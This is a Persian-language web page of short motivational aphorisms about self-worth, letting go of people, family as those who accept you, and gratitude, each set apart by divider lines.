  «چگونه نبودن» را به من آموختنـــــد
  ===============
  هرگز بخاطر اینکه کسی احساس کند در اوج است، خودتان را خوار و ذلیل نکنید
  ===============
  بجای اینکه آرزو کنید کاش شخص دیگری بودید
  به آن چیزی که هستید افتخار کنید.
  هرگز نمی دانید چه کسی به شما می نگریسته
  درحالیکه آرزویش این بوده که کاش جای شما باشد
  ===============
  گاهی خدا برای حفاظت از شما کسی را از زندگیتان حذف می کند.
  اصرار به برگشتنش نکنید
  ===============
  آدما مثل عکس هستن
  زیادی که بزرگشون کنی
  کیفیتشون میاد پایین
  ===============
  زندگی کوتاه نیست
  مشکل اینجاست که
  ما زندگی را دیر شروع میکنیم
  ===============
  در زندگی حقایقی هست که میشه فهمید . ولی نمیشه فهموند
  ===============
  خانواده همیشه هم خون بودن نیست
  خانواده یعنی آدمهایی در زندگیتان که
  خواهان شما در زندگیشان هستند .
  .آنهایی که شما را همانگونه که هستید میپذیرند .
  کسانی که حاضرند هر کاری بکنند تا لبخند را بر لبانتان ببینند
  و
  کسی که در هر شرایطی دوستتان دارد
  ===============
  هر روز سپاسگزارم برای:
  شب هایی که به صبح می رسند،
  دوستانی که بخشی از خانواده می شوند
  رویاهایی که تحقق می یابند و
  علاقه هایی که به عشق تبدیل می شوند

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

رمز امنیتی *

Watch Dragon ball super